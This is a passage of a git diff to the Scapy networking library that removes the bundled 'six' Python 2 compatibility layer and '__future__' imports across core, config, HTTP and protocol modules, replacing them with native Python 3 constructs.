= {} # type: Dict[str, List[_StateWrapper]] @@ -887,7 +888,7 @@ def my_send(self, pkt): def timer_by_name(self, name): # type: (str) -> Optional[Timer] - for _, timers in six.iteritems(self.timeout): + for _, timers in self.timeout.items(): for timer in timers: # type: Timer if timer._func.atmt_condname == name: return timer @@ -1313,17 +1314,21 @@ def run(self, elif c.type == _ATMT_Command.BREAKPOINT: raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501 elif c.type == _ATMT_Command.EXCEPTION: - six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2]) + # this code comes from the `six` module (`.reraise()`) + # to raise an exception with specified exc_info. + value = c.exc_info[0]() if c.exc_info[1] is None else c.exc_info[1] # type: ignore # noqa: E501 + if value.__traceback__ is not c.exc_info[2]: + raise value.with_traceback(c.exc_info[2]) + raise value return None def runbg(self, resume=None, wait=False): # type: (Optional[Message], Optional[bool]) -> None self.run(resume, wait) - def next(self): + def __next__(self): # type: () -> Any return self.run(resume=Message(type=_ATMT_Command.NEXT)) - __next__ = next def _flush_inout(self): # type: () -> None diff --git a/scapy/autorun.py b/scapy/autorun.py index fd9df73ce09..7cc21633eb5 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -7,9 +7,11 @@ Run commands when the Scapy interpreter starts. """ -from __future__ import print_function +import builtins import code +from io import StringIO import logging +from queue import Queue import sys import threading import traceback @@ -27,9 +29,6 @@ Tuple, ) -from scapy.libs.six.moves import queue -import scapy.libs.six as six - ######################### # Autorun stuff # @@ -63,7 +62,7 @@ def autorun_commands(_cmds, my_globals=None, verb=None): my_globals = _scapy_builtins() interp = ScapyAutorunInterpreter(locals=my_globals) try: - del six.moves.builtins.__dict__["scapy_session"]["_"] + del builtins.__dict__["scapy_session"]["_"] except KeyError: pass if verb is not None: @@ -99,9 +98,9 @@ def autorun_commands(_cmds, my_globals=None, verb=None): finally: conf.verb = sv try: - return six.moves.builtins.__dict__["scapy_session"]["_"] + return builtins.__dict__["scapy_session"]["_"] except KeyError: - return six.moves.builtins.__dict__.get("_", None) + return builtins.__dict__.get("_", None) def autorun_commands_timeout(cmds, timeout=None, **kwargs): @@ -113,7 +112,7 @@ def autorun_commands_timeout(cmds, timeout=None, **kwargs): if timeout is None: return autorun_commands(cmds, **kwargs) - q = queue.Queue() + q = Queue() # type: Queue[Any] def _runner(): # type: () -> None @@ -127,14 +126,14 @@ def _runner(): return q.get() -class StringWriter(six.StringIO): +class StringWriter(StringIO): """Util to mock sys.stdout and sys.stderr, and store their output in a 's' var.""" def __init__(self, debug=None): # type: (Optional[TextIO]) -> None self.s = "" self.debug = debug - six.StringIO.__init__(self) + super().__init__() def write(self, x): # type: (str) -> int diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 24872f09aad..8d68e785070 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -11,7 +11,6 @@ # Generators # ################ -from __future__ import absolute_import from functools import reduce import operator @@ -28,8 +27,6 @@ from scapy.error import Scapy_Exception from scapy.consts import WINDOWS -from scapy.libs.six.moves import range - from scapy.compat import ( Any, Dict, diff --git a/scapy/compat.py b/scapy/compat.py index b076f446ec0..357922e74ce 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -6,17 +6,12 @@ Python 2 and 3 link classes. """ -from __future__ import absolute_import import base64 import binascii import collections -import gzip -import socket import struct import sys -import scapy.libs.six as six - # Very important: will issue typing errors otherwise __all__ = [ # typing @@ -33,7 +28,6 @@ 'Iterator', 'List', 'Literal', - 'NamedTuple', 'NewType', 'NoReturn', 'Optional', @@ -52,14 +46,11 @@ 'FAKE_TYPING', 'TYPE_CHECKING', # compat - 'AddressFamily', 'base64_bytes', 'bytes_base64', 'bytes_encode', 'bytes_hex', 'chb', - 'gzip_compress', - 'gzip_decompress', 'hex_bytes', 'lambda_tuple_converter', 'orb', @@ -186,54 +177,21 @@ def cast(_type, obj): # type: ignore Union = _FakeType("Union") ValuesView = _FakeType("List", list) # type: ignore - class Sized(object): # type: ignore + class Sized: # type: ignore pass - @six.add_metaclass(_Generic_metaclass) - class Generic(object): # type: ignore + class Generic(metaclass=_Generic_metaclass): # type: ignore pass overload = lambda x: x -# Broken < Python 3.7 -if sys.version_info >= (3, 7): - from typing import NamedTuple -else: - # Hack for Python < 3.7 - Implement NamedTuple pickling - def _unpickleNamedTuple(name, len_params, *args): - return collections.namedtuple( - name, - args[:len_params] - )(*args[len_params:]) - - def NamedTuple(name, params): - tup_params = tuple(x[0] for x in params) - cls = collections.namedtuple(name, tup_params) - - class _NT(cls): - def __reduce__(self): - """Used by pickling methods""" - return (_unpickleNamedTuple, - (name, len(tup_params)) + tup_params + tuple(self)) - _NT.__name__ = cls.__name__ - return _NT - # Python 3.8 Only if sys.version_info >= (3, 8): from typing import Literal else: Literal = _FakeType("Literal") -# Python 3.4 -if sys.version_info >= (3, 4): - from socket import AddressFamily -else: - class AddressFamily: - AF_INET = socket.AF_INET - AF_INET6 = socket.AF_INET6 - AF_UNSPEC = socket.AF_UNSPEC - ########### # Python3 # @@ -265,70 +223,46 @@ def lambda_tuple_converter(func): from scapy.packet import Packet -if six.PY2: - bytes_encode = plain_str = str # type: Callable[[Any], bytes] - orb = ord # type: Callable[[bytes], int] - - def chb(x): - # type: (int) -> bytes - if isinstance(x, str): - return x - return chr(x) - - def raw(x): - # type: (Union[Packet]) -> bytes - """ - Builds a packet and returns its bytes representation. - This function is and will always be cross-version compatible - """ - if hasattr(x, "__bytes__"): - return x.__bytes__() - return bytes(x) -else: - def raw(x): - # type: (Union[Packet]) -> bytes - """ - Builds a packet and returns its bytes representation. - This function is and will always be cross-version compatible - """ - return bytes(x) - - def bytes_encode(x): - # type: (Any) -> bytes - """Ensure that the given object is bytes. - If the parameter is a packet, raw() should be preferred. - """ - if isinstance(x, str): - return x.encode() - return bytes(x) - - if sys.version_info[0:2] <= (3, 4): - def plain_str(x): - # type: (AnyStr) -> str - """Convert basic byte objects to str""" - if isinstance(x, bytes): - return x.decode(errors="ignore") - return str(x) - else: - # Python 3.5+ - def plain_str(x): - # type: (Any) -> str - """Convert basic byte objects to str""" - if isinstance(x, bytes): - return x.decode(errors="backslashreplace") - return str(x) - - def chb(x): - # type: (int) -> bytes - """Same than chr() but encode as bytes.""" - return struct.pack("!B", x) - - def orb(x): - # type: (Union[int, str, bytes]) -> int - """Return ord(x) when not already an int.""" - if isinstance(x, int): - return x - return ord(x) +def raw(x): + # type: (Union[Packet]) -> bytes + """ + Builds a packet and returns its bytes representation. + This function is and will always be cross-version compatible + """ + return bytes(x) + + +def bytes_encode(x): + # type: (Any) -> bytes + """Ensure that the given object is bytes. If the parameter is a + packet, raw() should be preferred. + + """ + if isinstance(x, str): + return x.encode() + return bytes(x) + + +def plain_str(x): + # type: (Any) -> str + """Convert basic byte objects to str""" + if isinstance(x, bytes): + return x.decode(errors="backslashreplace") + return str(x) + + +def chb(x): + # type: (int) -> bytes + """Same than chr() but encode as bytes.""" + return struct.pack("!B", x) + + +def orb(x): + # type: (Union[int, str, bytes]) -> int + """Return ord(x) when not already an int.""" + if isinstance(x, int): + return x + return ord(x) def bytes_hex(x): @@ -343,69 +277,25 @@ def hex_bytes(x): return binascii.a2b_hex(bytes_encode(x)) -if six.PY2: - def int_bytes(x, size): - # type: (int, int) -> bytes - """Convert an int to an arbitrary sized bytes string""" - _hx = hex(x)[2:].strip("L") - return binascii.unhexlify("0" * (size * 2 - len(_hx)) + _hx) +def int_bytes(x, size): + # type: (int, int) -> bytes + """Convert an int to an arbitrary sized bytes string""" + return x.to_bytes(size, byteorder='big') - def bytes_int(x): - # type: (bytes) -> int - """Convert an arbitrary sized bytes string to an int""" - return int(x.encode('hex'), 16) -else: - def int_bytes(x, size): - # type: (int, int) -> bytes - """Convert an int to an arbitrary sized bytes string""" - return x.to_bytes(size, byteorder='big') - def bytes_int(x): - # type: (bytes) -> int - """Convert an arbitrary sized bytes string to an int""" - return int.from_bytes(x, "big") +def bytes_int(x): + # type: (bytes) -> int + """Convert an arbitrary sized bytes string to an int""" + return int.from_bytes(x, "big") def base64_bytes(x): # type: (AnyStr) -> bytes """Turn base64 into bytes""" - if six.PY2: - return base64.decodestring(x) # type: ignore return base64.decodebytes(bytes_encode(x)) def bytes_base64(x): # type: (AnyStr) -> bytes """Turn bytes into base64""" - if six.PY2: - return base64.encodestring(x).replace('\n', '') # type: ignore return base64.encodebytes(bytes_encode(x)).replace(b'\n', b'') - - -if six.PY2: - import cgi - html_escape = cgi.escape -else: - import html - html_escape = html.escape - - -if six.PY2: - from StringIO import StringIO - - def gzip_decompress(x): - # type: (AnyStr) -> bytes - """Decompress using gzip""" - with gzip.GzipFile(fileobj=StringIO(x), mode='rb') as fdesc: - return fdesc.read() - - def gzip_compress(x): - # type: (AnyStr) -> bytes - """Compress using gzip""" - buf = StringIO() - with gzip.GzipFile(fileobj=buf, mode='wb') as fdesc: - fdesc.write(x) - return buf.getvalue() -else: - gzip_decompress = gzip.decompress - gzip_compress = gzip.compress diff --git a/scapy/config.py b/scapy/config.py index 51b675e7990..d9a89e6a7ef 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -7,8 +7,6 @@ Implementation of the configuration object. """ -from __future__ import absolute_import -from __future__ import print_function import atexit import copy @@ -25,7 +23,6 @@ from scapy.base_classes import BasePacket from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException -from scapy.libs import six from scapy.themes import NoTheme, apply_ipython_style from scapy.compat import ( @@ -249,14 +246,14 @@ def get(self, def __repr__(self): # type: () -> str lst = [] - for num, layer in six.iteritems(self.num2layer): + for num, layer in self.num2layer.items(): if layer in self.layer2num and self.layer2num[layer] == num: dir = "<->" else: dir = " ->" lst.append((num, "%#6x %s %-20s (%s)" % (num, dir, layer.__name__, layer._name))) - for layer, num in six.iteritems(self.layer2num): + for layer, num in self.layer2num.items(): if num not in self.num2layer or self.num2layer[num] != layer: lst.append((num, "%#6x <- %-20s (%s)" % (num, layer.__name__, layer._name))) @@ -303,7 +300,7 @@ def filter(self, items): """Disable dissection of unused layers to speed up dissection""" if self.filtered: raise ValueError("Already filtered. Please disable it first") - for lay in six.itervalues(self.ldict): + for lay in self.ldict.values(): for cls in lay: if cls not in self._backup_dict: self._backup_dict[cls] = cls.payload_guess[:] @@ -317,7 +314,7 @@ def unfilter(self): """Re-enable dissection for all layers""" if not self.filtered: raise ValueError("Not filtered. Please filter first") - for lay in six.itervalues(self.ldict): + for lay in self.ldict.values(): for cls in lay: cls.payload_guess = self._backup_dict[cls] self._backup_dict.clear() @@ -395,7 +392,7 @@ def update(self, # type: ignore **kwargs # type: Any ): # type: (...) -> None - for key, value in six.iteritems(other): + for key, value in other.items(): # We only update an element from `other` either if it does # not exist in `self` or if the entry in `self` is older. if key not in self or self._timetable[key] < other._timetable[key]: @@ -405,16 +402,21 @@ def update(self, # type: ignore def iteritems(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return six.iteritems(self.__dict__) # type: ignore + return self.__dict__.items() # type: ignore t0 = time.time() - return ((k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 + return ( + (k, v) for (k, v) in self.__dict__.items() + if t0 - self._timetable[k] < self.timeout + ) def iterkeys(self): # type: () -> Iterator[str] if self.timeout is None: - return six.iterkeys(self.__dict__) # type: ignore + return self.__dict__.keys() # type: ignore t0 = time.time() - return (k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 + return ( + k for k in self.__dict__ if t0 - self._timetable[k] < self.timeout + ) def __iter__(self): # type: () -> Iterator[str] @@ -423,30 +425,39 @@ def __iter__(self): def itervalues(self): # type: () -> Iterator[Tuple[str, Any]] if self.timeout is None: - return six.itervalues(self.__dict__) # type: ignore + return self.__dict__.values() # type: ignore t0 = time.time() - return (v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout) # noqa: E501 + return ( + v for (k, v) in self.__dict__.items() + if t0 - self._timetable[k] < self.timeout + ) def items(self): # type: () -> Any if self.timeout is None: return super(CacheInstance, self).items() t0 = time.time() - return [(k, v) for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 + return [ + (k, v) for (k, v) in self.__dict__.items() + if t0 - self._timetable[k] < self.timeout + ] def keys(self): # type: () -> Any if self.timeout is None: return super(CacheInstance, self).keys() t0 = time.time() - return [k for k in six.iterkeys(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 + return [k for k in self.__dict__ if t0 - self._timetable[k] < self.timeout] def values(self): # type: () -> Any if self.timeout is None: - return list(six.itervalues(self)) + return list(self.values()) t0 = time.time() - return [v for (k, v) in six.iteritems(self.__dict__) if t0 - self._timetable[k] < self.timeout] # noqa: E501 + return [ + v for (k, v) in self.__dict__.items() + if t0 - self._timetable[k] < self.timeout + ] def __len__(self): # type: () -> int @@ -462,9 +473,9 @@ def __repr__(self): # type: () -> str s = [] if self: - mk = max(len(k) for k in six.iterkeys(self.__dict__)) + mk = max(len(k) for k in self.__dict__) fmt = "%%-%is %%s" % (mk + 1) - for item in six.iteritems(self.__dict__): + for item in self.__dict__.items(): s.append(fmt % item) return "\n".join(s) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index b7917a89eb4..d09bf327b5f 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -15,7 +15,6 @@ from types import GeneratorType from threading import Lock -import scapy.libs.six as six from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ Tuple, Type, cast, Dict, orb, ValuesView from scapy.packet import Raw, Packet @@ -65,7 +64,7 @@ def _expand(self): @staticmethod def _flatten(x): # type: (Any) -> List[Any] - if isinstance(x, (six.string_types, bytes)): + if isinstance(x, (str, bytes)): return [x] elif hasattr(x, "__iter__") and hasattr(x, "__len__") and len(x) == 1: return list(*x) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index 3308f0a8608..f393704084f 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -17,7 +17,6 @@ cast, Callable, orb from scapy.contrib.automotive import log_automotive from scapy.packet import Packet -import scapy.libs.six as six from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception @@ -52,8 +51,7 @@ "GMLAN_DCEnumerator"] -@six.add_metaclass(abc.ABCMeta) -class GMLAN_Enumerator(ServiceEnumerator): +class GMLAN_Enumerator(ServiceEnumerator, metaclass=abc.ABCMeta): """ Abstract base class for GMLAN service enumerators. This class implements GMLAN specific functions. diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 37e97f194c8..25f5a28156d 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -13,13 +13,13 @@ import copy from collections import defaultdict, OrderedDict from itertools import chain +from typing import NamedTuple from scapy.compat import Any, Union, List, Optional, Iterable, \ - Dict, Tuple, Set, Callable, cast, NamedTuple, orb + Dict, Tuple, Set, Callable, cast, orb from scapy.contrib.automotive import log_automotive from scapy.error import Scapy_Exception from scapy.utils import make_lined_table, EDecimal -import scapy.libs.six as six from scapy.packet import Packet from scapy.contrib.automotive.ecu import EcuState, EcuResponse from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase, \ @@ -46,8 +46,7 @@ ("resp_ts", Union[EDecimal, float])]) -@six.add_metaclass(abc.ABCMeta) -class ServiceEnumerator(AutomotiveTestCase): +class ServiceEnumerator(AutomotiveTestCase, metaclass=abc.ABCMeta): """ Base class for ServiceEnumerators of automotive diagnostic protocols """ @@ -64,7 +63,7 @@ class ServiceEnumerator(AutomotiveTestCase): 'exit_if_service_not_supported': (bool, None), 'exit_scan_on_first_negative_response': (bool, None), 'retry_if_busy_returncode': (bool, None), - 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 + 'stop_event': (threading.Event, None), 'debug': (bool, None), 'scan_range': ((list, tuple, range), None), 'unittest': (bool, None) @@ -172,7 +171,7 @@ def _get_initial_requests(self, **kwargs): def __reduce__(self): # type: ignore f, t, d = super(ServiceEnumerator, self).__reduce__() # type: ignore try: - for k, v in six.iteritems(d["_request_iterators"]): + for k, v in d["_request_iterators"].items(): d["_request_iterators"][k] = list(v) except KeyError: pass @@ -689,8 +688,8 @@ def _get_label(self, response, positive_case="PR: PositiveResponse"): elif orb(bytes(response)[0]) == 0x7f: return self._get_negative_response_label(response) else: - if isinstance(positive_case, six.string_types): - return cast(str, positive_case) + if isinstance(positive_case, str): + return positive_case elif callable(positive_case): return positive_case(response) else: @@ -710,8 +709,11 @@ def supported_responses(self): return supported_resps -@six.add_metaclass(abc.ABCMeta) -class StateGeneratingServiceEnumerator(ServiceEnumerator, StateGenerator): +class StateGeneratingServiceEnumerator( + ServiceEnumerator, + StateGenerator, + metaclass=abc.ABCMeta +): def __init__(self): # type: () -> None super(StateGeneratingServiceEnumerator, self).__init__() diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index b55059071cc..943c66946fc 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -14,10 +14,10 @@ import inspect from collections import defaultdict -from typing import Sequence +from typing import NamedTuple, Sequence from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ - cast, Union, NamedTuple, orb, Set + cast, Union, orb, Set from scapy.contrib.automotive import log_automotive from scapy.packet import Raw, Packet import scapy.libs.six as six diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 4ba4dc60297..75a13b3de8f 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -9,7 +9,6 @@ BGP (Border Gateway Protocol). """ -from __future__ import absolute_import import struct import re import socket diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 7998248f5e3..df814e277a4 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -12,7 +12,6 @@ Cisco Discovery Protocol (CDP) extension for Scapy """ -from __future__ import absolute_import import struct from scapy.packet import Packet, bind_layers diff --git a/scapy/contrib/dtp.py b/scapy/contrib/dtp.py index dd4364c0e0a..603d16e7a34 100644 --- a/scapy/contrib/dtp.py +++ b/scapy/contrib/dtp.py @@ -17,8 +17,6 @@ - TLV code derived from the CDP implementation of scapy. (Thanks to Nicolas Bareil and Arnaud Ebalard) # noqa: E501 """ -from __future__ import absolute_import -from __future__ import print_function import struct from scapy.packet import Packet, bind_layers diff --git a/scapy/contrib/eigrp.py b/scapy/contrib/eigrp.py index 0dd188ec09d..6bfb1b5aa78 100644 --- a/scapy/contrib/eigrp.py +++ b/scapy/contrib/eigrp.py @@ -25,7 +25,6 @@ http://trac.secdev.org/scapy/ticket/18 - IOS / EIGRP Version Representation FIX by Dirk Loss """ -from __future__ import absolute_import import socket import struct diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index faaffba1a95..884a0693502 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -17,7 +17,6 @@ Some IEs: 3GPP TS 24.008 """ -from __future__ import absolute_import import struct from scapy.compat import chb, orb, bytes_encode diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index a6db44447fc..4d005f7e94a 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -14,7 +14,6 @@ Key (type value) : Description """ -from __future__ import absolute_import import struct from scapy.packet import Packet, bind_layers diff --git a/scapy/contrib/homepluggp.py b/scapy/contrib/homepluggp.py index 484c00f8241..4e89492c6db 100644 --- a/scapy/contrib/homepluggp.py +++ b/scapy/contrib/homepluggp.py @@ -5,7 +5,6 @@ # scapy.contrib.description = HomePlugGP Layer # scapy.contrib.status = loads -from __future__ import absolute_import from scapy.packet import Packet, bind_layers from scapy.fields import ByteEnumField, ByteField, FieldLenField, \ diff --git a/scapy/contrib/homeplugsg.py b/scapy/contrib/homeplugsg.py index 65497a2aa08..9b760910cbe 100644 --- a/scapy/contrib/homeplugsg.py +++ b/scapy/contrib/homeplugsg.py @@ -5,7 +5,6 @@ # scapy.contrib.description = HomePlugSG Layer # scapy.contrib.status = loads -from __future__ import absolute_import from scapy.packet import Packet, bind_layers from scapy.fields import FieldLenField, StrFixedLenField, StrLenField diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 6f4c0a6c7cd..68e6dbb12d2 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -18,8 +18,6 @@ # base_classes triggers an unwanted import warning -from __future__ import absolute_import -from __future__ import print_function import abc import re from io import BytesIO diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index 3ff05cf0884..c168df265c3 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -5,7 +5,6 @@ # scapy.contrib.description = ICMP Extensions # scapy.contrib.status = loads -from __future__ import absolute_import import struct import scapy diff --git a/scapy/contrib/igmp.py b/scapy/contrib/igmp.py index 21fc061720e..f01fa637c89 100644 --- a/scapy/contrib/igmp.py +++ b/scapy/contrib/igmp.py @@ -5,7 +5,6 @@ # scapy.contrib.description = Internet Group Management Protocol v1/v2 (IGMP/IGMPv2) # scapy.contrib.status = loads -from __future__ import print_function from scapy.compat import chb, orb from scapy.error import warning from scapy.fields import ByteEnumField, ByteField, IPField, XShortField diff --git a/scapy/contrib/igmpv3.py b/scapy/contrib/igmpv3.py index 110f5798cef..620d389c133 100644 --- a/scapy/contrib/igmpv3.py +++ b/scapy/contrib/igmpv3.py @@ -5,7 +5,6 @@ # scapy.contrib.description = Internet Group Management Protocol v3 (IGMPv3) # scapy.contrib.status = loads -from __future__ import print_function from scapy.packet import Packet, bind_layers from scapy.fields import BitField, ByteEnumField, ByteField, FieldLenField, \ FieldListField, IPField, PacketListField, ShortField, XShortField diff --git a/scapy/contrib/isis.py b/scapy/contrib/isis.py index 2d39a98c8c4..d277a27b568 100644 --- a/scapy/contrib/isis.py +++ b/scapy/contrib/isis.py @@ -42,7 +42,6 @@ """ -from __future__ import absolute_import import struct import random diff --git a/scapy/contrib/ldp.py b/scapy/contrib/ldp.py index 43e3528893b..ae36c58d062 100644 --- a/scapy/contrib/ldp.py +++ b/scapy/contrib/ldp.py @@ -13,7 +13,6 @@ """ -from __future__ import absolute_import import struct from scapy.compat import orb diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index 45b5ed47230..b3d805bc23b 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -10,8 +10,6 @@ Classes and functions for MACsec. """ -from __future__ import absolute_import -from __future__ import print_function import struct import copy diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index 13a924666b2..813c11c3e45 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -14,7 +14,6 @@ # scapy.contrib.description = Openflow v1.0 # scapy.contrib.status = loads -from __future__ import absolute_import import struct diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 3a0b9da437a..24db2a074c6 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -15,7 +15,6 @@ # scapy.contrib.description = OpenFlow v1.3 # scapy.contrib.status = loads -from __future__ import absolute_import import copy import struct diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index 829718fbb90..9d133bfb1af 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -11,7 +11,6 @@ PPI-GEOLOCATION tags """ -from __future__ import absolute_import import functools import struct diff --git a/scapy/contrib/send.py b/scapy/contrib/send.py index 82e8ef4688a..0eec1052469 100644 --- a/scapy/contrib/send.py +++ b/scapy/contrib/send.py @@ -11,7 +11,6 @@ # scapy.contrib.description = Secure Neighbor Discovery (SEND) (ICMPv6) # scapy.contrib.status = loads -from __future__ import absolute_import from scapy.packet import Packet from scapy.fields import BitField, ByteField, FieldLenField, PacketField, \ diff --git a/scapy/contrib/skinny.py b/scapy/contrib/skinny.py index 5bdf1a65c21..33389ebaa4a 100644 --- a/scapy/contrib/skinny.py +++ b/scapy/contrib/skinny.py @@ -11,7 +11,6 @@ Skinny Call Control Protocol (SCCP) extension """ -from __future__ import absolute_import import time import struct diff --git a/scapy/dadict.py b/scapy/dadict.py index f233dad5364..7f611453b99 100644 --- a/scapy/dadict.py +++ b/scapy/dadict.py @@ -7,8 +7,6 @@ Direct Access dictionary. """ -from __future__ import absolute_import -from __future__ import print_function from scapy.error import Scapy_Exception import scapy.libs.six as six from scapy.compat import plain_str diff --git a/scapy/fields.py b/scapy/fields.py index 395d09db842..87a5a2c0539 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -9,7 +9,6 @@ Fields: basic data structures that make up parts of packets. """ -from __future__ import absolute_import import calendar import collections import copy diff --git a/scapy/layers/all.py b/scapy/layers/all.py index ad6e4d0c6ae..57ce00a2c01 100644 --- a/scapy/layers/all.py +++ b/scapy/layers/all.py @@ -7,7 +7,6 @@ All layers. Configurable with conf.load_layers. """ -from __future__ import absolute_import # We import conf from arch to make sure arch specific layers are populated from scapy.arch import conf diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 698be33e38e..0db87e58be8 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -12,8 +12,6 @@ - rfc1533 - DHCP Options and BOOTP Vendor Extensions """ -from __future__ import absolute_import -from __future__ import print_function try: from collections.abc import Iterable except ImportError: diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 4230cbdc97a..acc15db768a 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -10,7 +10,6 @@ DHCPv6: Dynamic Host Configuration Protocol for IPv6. [RFC 3315,8415] """ -from __future__ import print_function import socket import struct import time diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 4d5bd88ef61..a229a043bf6 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -7,7 +7,6 @@ DNS: Domain Name System. """ -from __future__ import absolute_import import operator import socket import struct diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 530cdaba550..eb8b30d5ef3 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -11,7 +11,6 @@ - RadioTap """ -from __future__ import print_function import re import struct from zlib import crc32 diff --git a/scapy/layers/eap.py b/scapy/layers/eap.py index bb59a9a81a3..de3707e0591 100644 --- a/scapy/layers/eap.py +++ b/scapy/layers/eap.py @@ -7,8 +7,6 @@ Extensible Authentication Protocol (EAP) """ -from __future__ import absolute_import -from __future__ import print_function import struct diff --git a/scapy/layers/http.py b/scapy/layers/http.py index cd8f12d7af2..a2b263d0f6b 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -39,6 +39,7 @@ # It was reimplemented for scapy 2.4.3+ using sessions, stream handling. # Original Authors : Steeve Barbeau, Luca Invernizzi +import gzip import io import os import re @@ -47,8 +48,8 @@ import subprocess from scapy.base_classes import Net -from scapy.compat import plain_str, bytes_encode, \ - gzip_compress, gzip_decompress +from scapy.compat import plain_str, bytes_encode + from scapy.config import conf from scapy.consts import WINDOWS from scapy.error import warning, log_loading @@ -59,8 +60,6 @@ from scapy.layers.inet import TCP, TCP_client -from scapy.libs import six - try: import brotli _is_brotli_available = True @@ -261,7 +260,7 @@ def _dissect_headers(obj, s): continue obj.setfieldval(f.name, value) if headers: - headers = dict(six.itervalues(headers)) + headers = dict(headers.values()) obj.setfieldval('Unknown_Headers', headers) return first_line, body @@ -311,7 +310,7 @@ def post_dissect(self, s): import zlib s = zlib.decompress(s) elif "gzip" in encodings: - s = gzip_decompress(s) + s = gzip.decompress(s) elif "compress" in encodings: import lzw s = lzw.decompress(s) @@ -350,7 +349,7 @@ def post_build(self, pkt, pay): import zlib pay = zlib.compress(pay) elif "gzip" in encodings: - pay = gzip_compress(pay) + pay = gzip.compress(pay) elif "compress" in encodings: import lzw pay = lzw.compress(pay) @@ -412,7 +411,7 @@ def self_build(self, **kwargs): # Handle Unknown_Headers if self.Unknown_Headers: headers_text = b"" - for name, value in six.iteritems(self.Unknown_Headers): + for name, value in self.Unknown_Headers.items(): headers_text += _header_line(name, value) + b"\r\n" p = self.get_field("Unknown_Headers").addfield( self, p, headers_text diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 0c05d19a9af..244e678aab8 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -12,9 +12,6 @@ """ -from __future__ import absolute_import -from __future__ import print_function - from hashlib import md5 import random import socket diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 712c5d2cda2..705fc18e7f1 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -30,7 +30,6 @@ True """ -from __future__ import absolute_import try: from math import gcd except ImportError: diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index 05f1d504bfb..ae4ed466d7f 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -9,7 +9,6 @@ # Mostly based on https://tools.ietf.org/html/rfc2408 -from __future__ import absolute_import import struct from scapy.config import conf from scapy.packet import Packet, bind_bottom_up, bind_top_down diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index fb9b0542549..7658450e80b 100644 --- a/scapy/layers/l2.py +++ 